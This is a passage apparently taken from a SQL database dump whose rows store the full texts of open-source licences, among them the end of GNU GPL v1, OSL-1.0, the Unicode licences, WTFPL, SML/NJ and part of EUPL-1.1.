License.\n\nd) You may charge a fee for the physical act of transferring a copy, and you\nmay at your option offer warranty protection in exchange for a fee.\n\nMere aggregation of another independent work with the Program (or its derivative)\non a volume of a storage or distribution medium does not bring the other work\nunder the scope of these terms.\n\n3. You may copy and distribute the Program (or a portion or derivative of\nit, under Paragraph 2) in object code or executable form under the terms of\nParagraphs 1 and 2 above provided that you also do one of the following:\n\na) accompany it with the complete corresponding machine-readable source code,\nwhich must be distributed under the terms of Paragraphs 1 and 2 above; or,\n\nb) accompany it with a written offer, valid for at least three years, to give\nany third party free (except for a nominal charge for the cost of distribution)\na complete machine-readable copy of the corresponding source code, to be distributed\nunder the terms of Paragraphs 1 and 2 above; or,\n\nc) accompany it with the information you received as to where the corresponding\nsource code may be obtained. (This alternative is allowed only for noncommercial\ndistribution and only if you received the program in object code or executable\nform alone.)\n\nSource code for a work means the preferred form of the work for making modifications\nto it. For an executable file, complete source code means all the source code\nfor all modules it contains; but, as a special exception, it need not include\nsource code for modules which are standard libraries that accompany the operating\nsystem on which the executable file runs, or for standard header files or\ndefinitions files that accompany that operating system.\n\n4. You may not copy, modify, sublicense, distribute or transfer the Program\nexcept as expressly provided under this General Public License. Any attempt\notherwise to copy, modify, sublicense, distribute or transfer the Program\nis void, and will automatically terminate your rights to use the Program under\nthis License. However, parties who have received copies, or rights to use\ncopies, from you under this General Public License will not have their licenses\nterminated so long as such parties remain in full compliance.\n\n5. By copying, distributing or modifying the Program (or any work based on\nthe Program) you indicate your acceptance of this license to do so, and all\nits terms and conditions.\n\n6. Each time you redistribute the Program (or any work based on the Program),\nthe recipient automatically receives a license from the original licensor\nto copy, distribute or modify the Program subject to these terms and conditions.\nYou may not impose any further restrictions on the recipients\' exercise of\nthe rights granted herein.\n\n7. The Free Software Foundation may publish revised and/or new versions of\nthe General Public License from time to time. Such new versions will be similar\nin spirit to the present version, but may differ in detail to address new\nproblems or concerns.\n\nEach version is given a distinguishing version number. If the Program specifies\na version number of the license which applies to it and \"any later version\",\nyou have the option of following the terms and conditions either of that version\nor of any later version published by the Free Software Foundation. If the\nProgram does not specify a version number of the license, you may choose any\nversion ever published by the Free Software Foundation.\n\n8. If you wish to incorporate parts of the Program into other free programs\nwhose distribution conditions are different, write to the author to ask for\npermission. For software which is copyrighted by the Free Software Foundation,\nwrite to the Free Software Foundation; we sometimes make exceptions for this.\nOur decision will be guided by the two goals of preserving the free status\nof all derivatives of our free software and of promoting the sharing and reuse\nof software generally.\n\n \n\n NO WARRANTY 9.\n\nBECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE\nPROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE\nSTATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM\n\"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME\nTHE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n10. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE\nTHE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY\nGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE\nOR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA\nOR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES\nOR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH\nHOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\nEND OF TERMS AND CONDITIONS\n\nAppendix: How to Apply These Terms to Your New Programs\n\nIf you develop a new program, and you want it to be of the greatest possible\nuse to humanity, the best way to achieve this is to make it free software\nwhich everyone can redistribute and change under these terms.\n\nTo do so, attach the following notices to the program. It is safest to attach\nthem to the start of each source file to most effectively convey the exclusion\nof warranty; and each file should have at least the \"copyright\" line and a\npointer to where the full notice is found.\n\n<one line to give the program\'s name and a brief idea of what it does.>\n\nCopyright (C) 19yy <name of author>\n\nThis program is free software; you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation; either version 1, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License along with\nthis program; if not, write to the Free Software Foundation, Inc., 675 Mass\nAve, Cambridge, MA 02139, USA.\n\nAlso add information on how to contact you by electronic and paper mail.\n\nIf the program is interactive, make it output a short notice like this when\nit starts in an interactive mode:\n\nGnomovision version 69, Copyright (C) 19xx name of author Gnomovision comes\nwith ABSOLUTELY NO WARRANTY; for details type `show w\'. This is free software,\nand you are welcome to redistribute it under certain conditions; type `show\nc\' for details.\n\nThe hypothetical commands `show w\' and `show c\' should show the appropriate\nparts of the General Public License. Of course, the commands you use may be\ncalled something other than `show w\' and `show c\'; they could even be mouse-clicks\nor menu items--whatever suits your program.\n\nYou should also get your employer (if you work as a programmer) or your school,\nif any, to sign a \"copyright disclaimer\" for the program, if necessary. Here\na sample; alter the names:\n\nYoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision\'\n(a program to direct compilers to make passes at assemblers) written by James\nHacker.\n\n<signature of Ty Coon>, 1 April 1989 Ty Coon, President of Vice\n\nThat\'s all there is to it!\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(316,'OSL-1.0','The Open Software License v. 1.0\n\nThis Open Software License (the \"License\") applies to any original work of\nauthorship (the \"Original Work\") whose owner (the \"Licensor\") has placed the\nfollowing notice immediately following the copyright notice for the Original\nWork:\n\n\" Licensed under the Open Software License version 1.0 \"\n\nLicense Terms\n\n1) Grant of Copyright License. Licensor hereby grants You a world-wide, royalty-free,\nnon-exclusive, perpetual, non-sublicenseable license to do the following:\n\n a) to reproduce the Original Work in copies;\n\nb) to prepare derivative works (\"Derivative Works\") based upon the Original\nWork;\n\nc) to distribute copies of the Original Work and Derivative Works to the public,\nwith the proviso that copies of Original Work or Derivative Works that You\ndistribute shall be licensed under the Open Software License;\n\n d) to perform the Original Work publicly; and\n\n e) to display the Original Work publicly.\n\n2) Grant of Patent License. Licensor hereby grants You a world-wide, royalty-free,\nnon-exclusive, perpetual, non-sublicenseable license, under patent claims\nowned or controlled by the Licensor that are embodied in the Original Work\nas furnished by the Licensor (\"Licensed Claims\") to make, use, sell and offer\nfor sale the Original Work. Licensor hereby grants You a world-wide, royalty-free,\nnon-exclusive, perpetual, non-sublicenseable license under the Licensed Claims\nto make, use, sell and offer for sale Derivative Works.\n\n3) Grant of Source Code License. The term \"Source Code\" means the preferred\nform of the Original Work for making modifications to it and all available\ndocumentation describing how to access and modify the Original Work. Licensor\nhereby agrees to provide a machine-readable copy of the Source Code of the\nOriginal Work along with each copy of the Original Work that Licensor distributes.\nLicensor reserves the right to satisfy this obligation by placing a machine-readable\ncopy of the Source Code in an information repository reasonably calculated\nto permit inexpensive and convenient access by You for as long as Licensor\ncontinues to distribute the Original Work, and by publishing the address of\nthat information repository in a notice immediately following the copyright\nnotice that applies to the Original Work.\n\n4) Exclusions From License Grant. Nothing in this License shall be deemed\nto grant any rights to trademarks, copyrights, patents, trade secrets or any\nother intellectual property of Licensor except as expressly stated herein.\nNo patent license is granted to make, use, sell or offer to sell embodiments\nof any patent claims other than the Licensed Claims defined in Section 2.\nNo right is granted to the trademarks of Licensor even if such marks are included\nin the Original Work. Nothing in this License shall be interpreted to prohibit\nLicensor from licensing under different terms from this License any Original\nWork that Licensor otherwise would have a right to license.\n\n5) External Deployment. The term \"External Deployment\" means the use or distribution\nof the Original Work or Derivative Works in any way such that the Original\nWork or Derivative Works may be accessed or used by anyone other than You,\nwhether the Original Work or Derivative Works are distributed to those persons,\nmade available as an application intended for use over a computer network,\nor used to provide services or otherwise deliver content to anyone other than\nYou. As an express condition for the grants of license hereunder, You agree\nthat any External Deployment by You shall be deemed a distribution and shall\nbe licensed to all under the terms of this License, as prescribed in section\n1(c) herein.\n\n6) Warranty and Disclaimer of Warranty. LICENSOR WARRANTS THAT THE COPYRIGHT\nIN AND TO THE ORIGINAL WORK IS OWNED BY THE LICENSOR OR THAT THE ORIGINAL\nWORK IS DISTRIBUTED BY LICENSOR UNDER A VALID CURRENT LICENSE FROM THE COPYRIGHT\nOWNER. EXCEPT AS EXPRESSLY STATED IN THE IMMEDIATELY PRECEEDING SENTENCE,\nTHE ORIGINAL WORK IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT\nWARRANTY, EITHER EXPRESS OR IMPLIED, INCLUDING, WITHOUT LIMITATION, THE WARRANTY\nOF NON-INFRINGEMENT AND WARRANTIES THAT THE ORIGINAL WORK IS MERCHANTABLE\nOR FIT FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY OF THE\nORIGINAL WORK IS WITH YOU. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL\nPART OF THIS LICENSE. NO LICENSE TO ORIGINAL WORK IS GRANTED HEREUNDER EXCEPT\nUNDER THIS DISCLAIMER.\n\n7) Limitation of Liability. UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY,\nWHETHER TORT (INCLUDING NEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL THE LICENSOR\nBE LIABLE TO ANY PERSON FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR\nCONSEQUENTIAL DAMAGES OF ANY CHARACTER ARISING AS A RESULT OF THIS LICENSE\nOR THE USE OF THE ORIGINAL WORK INCLUDING, WITHOUT LIMITATION, DAMAGES FOR\nLOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND\nALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PERSON SHALL HAVE BEEN\nINFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY\nSHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH\nPARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n8) Acceptance and Termination. Nothing else but this License (or another written\nagreement between Licensor and You) grants You permission to create Derivative\nWorks based upon the Original Work, and any attempt to do so except under\nthe terms of this License (or another written agreement between Licensor and\nYou) is expressly prohibited by U.S. copyright law, the equivalent laws of\nother countries, and by international treaty. Therefore, by exercising any\nof the rights granted to You in Sections 1 and 2 herein, You indicate Your\nacceptance of this License and all of its terms and conditions. This license\nshall terminate immediately and you may no longer exercise any of the rights\ngranted to You by this License upon Your failure to honor the proviso in Section\n1(c) herein.\n\n9) Mutual Termination for Patent Action. This License shall terminate automatically\nand You may no longer exercise any of the rights granted to You by this License\nif You file a lawsuit in any court alleging that any OSI Certified open source\nsoftware that is licensed under any license containing this \"Mutual Termination\nfor Patent Action\" clause infringes any patent claims that are essential to\nuse that software.\n\n10) Jurisdiction, Venue and Governing Law. You agree that any lawsuit arising\nunder or relating to this License shall be maintained in the courts of the\njurisdiction wherein the Licensor resides or in which Licensor conducts its\nprimary business, and under the laws of that jurisdiction excluding its conflict-of-law\nprovisions. The application of the United Nations Convention on Contracts\nfor the International Sale of Goods is expressly excluded. Any use of the\nOriginal Work outside the scope of this License or after its termination shall\nbe subject to the requirements and penalties of the U.S. Copyright Act, 17\nU.S.C. § 101 et seq., the equivalent laws of other countries, and international\ntreaty. This section shall survive the termination of this License.\n\n11) Attorneys Fees. In any action to enforce the terms of this License or\nseeking damages relating thereto, the prevailing party shall be entitled to\nrecover its costs and expenses, including, without limitation, reasonable\nattorneys\' fees and costs incurred in connection with such action, including\nany appeal of such action. This section shall survive the termination of this\nLicense.\n\n12) Miscellaneous. This License represents the complete agreement concerning\nthe subject matter hereof. If any provision of this License is held to be\nunenforceable, such provision shall be reformed only to the extent necessary\nto make it enforceable.\n\n13) Definition of \"You\" in This License. \"You\" throughout this License, whether\nin upper or lower case, means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License. For legal entities,\n\"You\" includes any entity that controls, is controlled by, or is under common\ncontrol with you. For purposes of this definition, \"control\" means (i) the\npower, direct or indirect, to cause the direction or management of such entity,\nwhether by contract or otherwise, or (ii) ownership of fifty percent (50%)\nor more of the outstanding shares, or (iii) beneficial ownership of such entity.\n\nThis license is Copyright (C) 2002 Lawrence E. Rosen. All rights reserved.\nPermission is hereby granted to copy and distribute this license without modification.\nThis license may not be modified without the express written permission of\nits copyright owner.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(317,'Unicode-DFS-2016','UNICODE, INC. LICENSE AGREEMENT - DATA FILES AND SOFTWARE\n\nUnicode Data Files include all data files under the directories http://www.unicode.org/Public/,\nhttp://www.unicode.org/reports/, http://www.unicode.org/cldr/data/, http://source.icu-project.org/repos/icu/,\nand http://www.unicode.org/utility/trac/browser/.\n\nUnicode Data Files do not include PDF online code charts under the directory\nhttp://www.unicode.org/Public/.\n\nSoftware includes any source code published in the Unicode Standard or under\nthe directories http://www.unicode.org/Public/, http://www.unicode.org/reports/,\nhttp://www.unicode.org/cldr/data/, http://source.icu-project.org/repos/icu/,\nand http://www.unicode.org/utility/trac/browser/.\n\nNOTICE TO USER: Carefully read the following legal agreement. BY DOWNLOADING,\nINSTALLING, COPYING OR OTHERWISE USING UNICODE INC.\'S DATA FILES (\"DATA FILES\"),\nAND/OR SOFTWARE (\"SOFTWARE\"), YOU UNEQUIVOCALLY ACCEPT, AND AGREE TO BE BOUND\nBY, ALL OF THE TERMS AND CONDITIONS OF THIS AGREEMENT. IF YOU DO NOT AGREE,\nDO NOT DOWNLOAD, INSTALL, COPY, DISTRIBUTE OR USE THE DATA FILES OR SOFTWARE.\n\nCOPYRIGHT AND PERMISSION NOTICE\n\nCopyright © 1991-2016 Unicode, Inc. All rights reserved. Distributed under\nthe Terms of Use in http://www.unicode.org/copyright.html.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof the Unicode data files and any associated documentation (the \"Data Files\")\nor Unicode software and any associated documentation (the \"Software\") to deal\nin the Data Files or Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, and/or sell copies\nof the Data Files or Software, and to permit persons to whom the Data Files\nor Software are furnished to do so, provided that either\n\n(a) this copyright and permission notice appear with all copies of the Data\nFiles or Software, or\n\n (b) this copyright and permission notice appear in associated Documentation.\n\nTHE DATA FILES AND SOFTWARE ARE PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY\nKIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF THIRD PARTY RIGHTS.\nIN NO EVENT SHALL THE COPYRIGHT HOLDER OR HOLDERS INCLUDED IN THIS NOTICE\nBE LIABLE FOR ANY CLAIM, OR ANY SPECIAL INDIRECT OR CONSEQUENTIAL DAMAGES,\nOR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER\nIN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT\nOF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THE DATA FILES OR SOFTWARE.\n\nExcept as contained in this notice, the name of a copyright holder shall not\nbe used in advertising or otherwise to promote the sale, use or other dealings\nin these Data Files or Software without prior written authorization of the\ncopyright holder.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(318,'WTFPL','DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\n\nVersion 2, December 2004\n\nCopyright (C) 2004 Sam Hocevar <sam@hocevar.net>\n\nEveryone is permitted to copy and distribute verbatim or modified copies of\nthis license document, and changing it is allowed as long as the name is changed.\n\nDO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\n\nTERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n 0. You just DO WHAT THE FUCK YOU WANT TO.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(319,'Unicode-TOU','Unicode Terms of Use\n\nFor the general privacy policy governing access to this site, see the Unicode\nPrivacy Policy. For trademark usage, see the Unicode® Consortium Name and\nTrademark Usage Policy.\n\n A. Unicode Copyright.\n\n 1. Copyright © 1991-2014 Unicode, Inc. All rights reserved.\n\n2. Certain documents and files on this website contain a legend indicating\nthat \"Modification is permitted.\" Any person is hereby authorized, without\nfee, to modify such documents and files to create derivative works conforming\nto the Unicode® Standard, subject to Terms and Conditions herein.\n\n3. Any person is hereby authorized, without fee, to view, use, reproduce,\nand distribute all documents and files solely for informational purposes in\nthe creation of products supporting the Unicode Standard, subject to the Terms\nand Conditions herein.\n\n4. Further specifications of rights and restrictions pertaining to the use\nof the particular set of data files known as the \"Unicode Character Database\"\ncan be found in Exhibit 1.\n\n5. Each version of the Unicode Standard has further specifications of rights\nand restrictions of use. For the book editions (Unicode 5.0 and earlier),\nthese are found on the back of the title page. The online code charts carry\nspecific restrictions. All other files, including online documentation of\nthe core specification for Unicode 6.0 and later, are covered under these\ngeneral Terms of Use.\n\n6. No license is granted to \"mirror\" the Unicode website where a fee is charged\nfor access to the \"mirror\" site.\n\n7. Modification is not permitted with respect to this document. All copies\nof this document must be verbatim.\n\nB. Restricted Rights Legend. Any technical data or software which is licensed\nto the United States of America, its agencies and/or instrumentalities under\nthis Agreement is commercial technical data or commercial computer software\ndeveloped exclusively at private expense as defined in FAR 2.101, or DFARS\n252.227-7014 (June 1995), as applicable. For technical data, use, duplication,\nor disclosure by the Government is subject to restrictions as set forth in\nDFARS 202.227-7015 Technical Data, Commercial and Items (Nov 1995) and this\nAgreement. For Software, in accordance with FAR 12-212 or DFARS 227-7202,\nas applicable, use, duplication or disclosure by the Government is subject\nto the restrictions set forth in this Agreement.\n\n C. Warranties and Disclaimers.\n\n1. This publication and/or website may include technical or typographical\nerrors or other inaccuracies . Changes are periodically added to the information\nherein; these changes will be incorporated in new editions of the publication\nand/or website. Unicode may make improvements and/or changes in the product(s)\nand/or program(s) described in this publication and/or website at any time.\n\n2. If this file has been purchased on magnetic or optical media from Unicode,\nInc. the sole and exclusive remedy for any claim will be exchange of the defective\nmedia within ninety (90) days of original purchase.\n\n3. EXCEPT AS PROVIDED IN SECTION C.2, THIS PUBLICATION AND/OR SOFTWARE IS\nPROVIDED \"AS IS\" WITHOUT WARRANTY OF ANY KIND EITHER EXPRESS, IMPLIED, OR\nSTATUTORY, INCLUDING, BUT NOT LIMITED TO, ANY WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT. UNICODE AND ITS LICENSORS\nASSUME NO RESPONSIBILITY FOR ERRORS OR OMISSIONS IN THIS PUBLICATION AND/OR\nSOFTWARE OR OTHER DOCUMENTS WHICH ARE REFERENCED BY OR LINKED TO THIS PUBLICATION\nOR THE UNICODE WEBSITE.\n\nD. Waiver of Damages. In no event shall Unicode or its licensors be liable\nfor any special, incidental, indirect or consequential damages of any kind,\nor any damages whatsoever, whether or not Unicode was advised of the possibility\nof the damage, including, without limitation, those resulting from the following:\nloss of use, data or profits, in connection with the use, modification or\ndistribution of this information or its derivatives.\n\n E. Trademarks & Logos.\n\n1. The Unicode Word Mark and the Unicode Logo are trademarks of Unicode, Inc.\n\"The Unicode Consortium\" and \"Unicode, Inc.\" are trade names of Unicode, Inc.\nUse of the information and materials found on this website indicates your\nacknowledgement of Unicode, Inc.\'s exclusive worldwide rights in the Unicode\nWord Mark, the Unicode Logo, and the Unicode trade names.\n\n2. The Unicode Consortium Name and Trademark Usage Policy (\"Trademark Policy\")\nare incorporated herein by reference and you agree to abide by the provisions\nof the Trademark Policy, which may be changed from time to time in the sole\ndiscretion of Unicode, Inc.\n\n3. All third party trademarks referenced herein are the property of their\nrespective owners.\n\n F. Miscellaneous.\n\n1. Jurisdiction and Venue. This server is operated from a location in the\nState of California, United States of America. Unicode makes no representation\nthat the materials are appropriate for use in other locations. If you access\nthis server from other locations, you are responsible for compliance with\nlocal laws. This Agreement, all use of this site and any claims and damages\nresulting from use of this site are governed solely by the laws of the State\nof California without regard to any principles which would apply the laws\nof a different jurisdiction. The user agrees that any disputes regarding this\nsite shall be resolved solely in the courts located in Santa Clara County,\nCalifornia. The user agrees said courts have personal jurisdiction and agree\nto waive any right to transfer the dispute to any other forum.\n\n2. Modification by Unicode Unicode shall have the right to modify this Agreement\nat any time by posting it to this site. The user may not assign any part of\nthis Agreement without Unicode\'s prior written consent.\n\n3. Taxes. The user agrees to pay any taxes arising from access to this website\nor use of the information herein, except for those based on Unicode\'s net\nincome.\n\n4. Severability. If any provision of this Agreement is declared invalid or\nunenforceable, the remaining provisions of this Agreement shall remain in\neffect.\n\n5. Entire Agreement. This Agreement constitutes the entire agreement between\nthe parties.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(320,'SMLNJ','STANDARD ML OF NEW JERSEY COPYRIGHT NOTICE, LICENSE AND DISCLAIMER.\n\nCopyright (c) 2001-2011 by The Fellowship of SML/NJ\n\nCopyright (c) 1989-2001 by Lucent Technologies\n\nPermission to use, copy, modify, and distribute this software and its documentation\nfor any purpose and without fee is hereby granted, provided that the above\ncopyright notice appear in all copies and that both the copyright notice and\nthis permission notice and warranty disclaimer appear in supporting documentation,\nand that the name of Lucent Technologies, Bell Labs or any Lucent entity not\nbe used in advertising or publicity pertaining to distribution of the software\nwithout specific, written prior permission.\n\nLucent disclaims all warranties with regard to this software, including all\nimplied warranties of merchantability and fitness. In no event shall Lucent\nbe liable for any special, indirect or consequential damages or any damages\nwhatsoever resulting from loss of use, data or profits, whether in an action\nof contract, negligence or other tortious action, arising out of or in connection\nwith the use or performance of this software.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(321,'EUPL-1.1','European Union Public Licence V. 1.1\n\nEUPL (c) the European Community 2007\n\nThis European Union Public Licence (the \"EUPL\") applies to the Work or Software\n(as defined below) which is provided under the terms of this Licence. Any\nuse of the Work, other than as authorised under this Licence is prohibited\n(to the extent such use is covered by a right of the copyright holder of the\nWork).\n\nThe Original Work is provided under the terms of this Licence when the Licensor\n(as defined below) has placed the following notice immediately following the\ncopyright notice for the Original Work:\n\n \n\n Licensed under the EUPL V.1.1\n\n \n\nor has expressed by any other mean his willingness to license under the EUPL.\n\n 1. Definitions\n\n In this Licence, the following terms have the following meaning:\n\n - The Licence: this Licence.\n\n- The Original Work or the Software: the software distributed and/or communicated\nby the Licensor under this Licence, available as Source Code and also as Executable\nCode as the case may be.\n\n- Derivative Works: the works or software that could be created by the Licensee,\nbased upon the Original Work or modifications thereof. This Licence does not\ndefine the extent of modification or dependence on the Original Work required\nin order to classify a work as a Derivative Work; this extent is determined\nby copyright law applicable in the country mentioned in Article 15.\n\n - The Work: the Original Work and/or its Derivative Works.\n\n- The Source Code: the human-readable form of the Work which is the most convenient\nfor people to study and modify.\n\n- The Executable Code: any code which has generally been compiled and which\nis meant to be interpreted by a computer as a program.\n\n- The Licensor: the natural or legal person that distributes and/or communicates\nthe Work under the Licence.\n\n- Contributor(s): any natural or legal person who modifies the Work under\nthe Licence, or otherwise contributes to the creation of a Derivative Work.\n\n- The Licensee or \"You\": any natural or legal person who makes any usage of\nthe Software under the terms of the Licence.\n\n- Distribution and/or Communication: any act of selling, giving, lending,\nrenting, distributing, communicating, transmitting, or otherwise making available,\non-line or off-line, copies of the Work or providing access to its essential\nfunctionalities at the disposal of any other natural or legal person.\n\n 2. Scope of the rights granted by the Licence\n\nThe Licensor hereby grants You a world-wide, royalty-free, non-exclusive,\nsublicensable licence to do the following, for the duration of copyright vested\nin the Original Work:\n\n - use the Work in any circumstance and for all usage,\n\n - reproduce the Work,\n\n- modify the Original Work, and make Derivative Works based upon the Work,\n\n- communicate to the public, including the right to make available or display\nthe Work or copies thereof to the public and perform publicly, as the case\nmay be, the Work,\n\n - distribute the Work or copies thereof,\n\n - lend and rent the Work or copies thereof,\n\n - sub-license rights in the Work or copies thereof.\n\nThose rights can be exercised on any media, supports and formats, whether\nnow known or later invented, as far as the applicable law permits so.\n\nIn the countries where moral rights apply, the Licensor waives his right to\nexercise his moral right to the extent allowed by law in order to make effective\nthe licence of the economic rights here above listed.\n\nThe Licensor grants to the Licensee royalty-free, non exclusive usage rights\nto any patents held by the Licensor, to the extent necessary to make use of\nthe rights granted on the Work under this Licence.\n\n 3. Communication of the Source Code\n\nThe Licensor may provide the Work either in its Source Code form, or as Executable\nCode. If the Work is provided as Executable Code, the Licensor provides in\naddition a machine-readable copy of the Source Code of the Work along with\neach copy of the Work that the Licensor distributes or indicates, in a notice\nfollowing the copyright notice attached to the Work, a repository where the\nSource Code is easily and freely accessible for as long as the Licensor continues\nto distribute and/or communicate the Work.\n\n 4. Limitations on copyright\n\nNothing in this Licence is intended to deprive the Licensee of the benefits\nfrom any exception or limitation to the exclusive rights of the rights owners\nin the Original Work or Software, of the exhaustion of those rights or of\nother applicable limitations thereto.\n\n 5. Obligations of the Licensee\n\nThe grant of the rights mentioned above is subject to some restrictions and\nobligations imposed on the Licensee. Those obligations are the following:\n\nAttribution right: the Licensee shall keep intact all copyright, patent or\ntrademarks notices and all notices that refer to the Licence and to the disclaimer\nof warranties. The Licensee must include a copy of such notices and a copy\nof the Licence with every copy of the Work he/she distributes and/or communicates.\nThe Licensee must cause any Derivative Work to carry prominent notices stating\nthat the Work has been modified and the date of modification.\n\nCopyleft clause: If the Licensee distributes and/or communicates copies of\nthe Original Works or Derivative Works based upon the Original Work, this\nDistribution and/or Communication will be done under the terms of this Licence\nor of a later version of this Licence unless the Original Work is expressly\ndistributed only under this version of the Licence. The Licensee (becoming\nLicensor) cannot offer or impose any additional terms or conditions on the\nWork or Derivative Work that alter or restrict the terms of the Licence.\n\nCompatibility clause: If the Licensee Distributes and/or Communicates Derivative\nWorks or copies thereof based upon both the Original Work and another work\nlicensed under a Compatible Licence, this Distribution and/or Communication\ncan be done under the terms of this Compatible Licence. For the sake of this\nclause, \"Compatible Licence,\" refers to the licences listed in the appendix\nattached to this Licence. Should the Licensee\'s obligations under the Compatible\nLicence conflict with his/her obligations under this Licence, the obligations\nof the Compatible Licence shall prevail.\n\nProvision of Source Code: When distributing and/or communicating copies of\nthe Work, the Licensee will provide a machine-readable copy of the Source\nCode or indicate a repository where this Source will be easily and freely\navailable for as long as the Licensee continues to distribute and/or communicate\nthe Work.\n\nLegal Protection: This Licence does not grant permission to use the trade\nnames, trademarks, service marks, or names of the Licensor, except as required\nfor reasonable and customary use in describing the origin of the Work and\nreproducing the content of the copyright notice.\n\n 6. Chain of Authorship\n\nThe original Licensor warrants that the copyright in the Original Work granted\nhereunder is owned by him/her or licensed to him/her and that he/she has the\npower and authority to grant the Licence.\n\nEach Contributor warrants that the copyright in the modifications he/she brings\nto the Work are owned by him/her or licensed to him/her and that he/she has\nthe power and authority to grant the Licence.\n\nEach time You accept the Licence, the original Licensor and subsequent Contributors\ngrant You a licence to their contributions to the Work, under the terms of\nthis Licence.\n\n 7. Disclaimer of Warranty\n\nThe Work is a work in progress, which is continuously improved by numerous\ncontributors. It is not a finished work and may therefore contain defects\nor \"bugs\" inherent to this type of software development.\n\nFor the above reason, the Work is provided under the Licence on an \"as is\"\nbasis and without warranties of any kind concerning the Work, including without\nlimitation merchantability, fitness for a particular purpose, absence of defects\nor errors, accuracy, non-infringement of intellectual property rights other\nthan copyright as stated in Article 6 of this Licence.\n\nThis disclaimer of warranty is an essential part of the Licence and a condition\nfor the grant of any rights to the Work.\n\n 8. Disclaimer of Liability\n\nExcept in the cases of wilful misconduct or damages directly caused to natural\npersons, the Licensor will in no event be liable for any direct or indirect,\nmaterial or moral, damages of any kind, arising out of the Licence or of the\nuse of the Work, including without limitation, damages for loss of goodwill,\nwork stoppage, computer failure or malfunction, loss of data or any commercial\ndamage, even if the Licensor has been advised of the possibility of such damage.\nHowever, the Licensor will be liable under statutory product liability laws\nas far such laws apply to the Work.\n\n 9. Additional agreements\n\nWhile distributing the Original Work or Derivative Works, You may choose to\nconclude an additional agreement to offer, and charge a fee for, acceptance\nof support, warranty, indemnity, or other liability obligations and/or services\nconsistent with this Licence. However, in accepting such obligations, You\nmay act only on your own behalf and on your sole responsibility, not on behalf\nof the original Licensor or any other Contributor, and only if You agree to\nindemnify, defend, and hold each Contributor harmless for any liability incurred\nby, or claims asserted against such Contributor by the fact You have accepted\nany such warranty or additional liability.\n\n 10. Acceptance of the Licence\n\nThe provisions of this Licence can be accepted by clicking on an icon \"I agree\"\nplaced under the bottom of a window displaying the text of this Licence or\nby affirming consent in any other similar way, in accordance with the rules\nof applicable law. Clicking on that icon indicates your clear and irrevocable\nacceptance of this Licence and all of its terms and conditions.\n\nSimilarly, you irrevocably accept this Licence 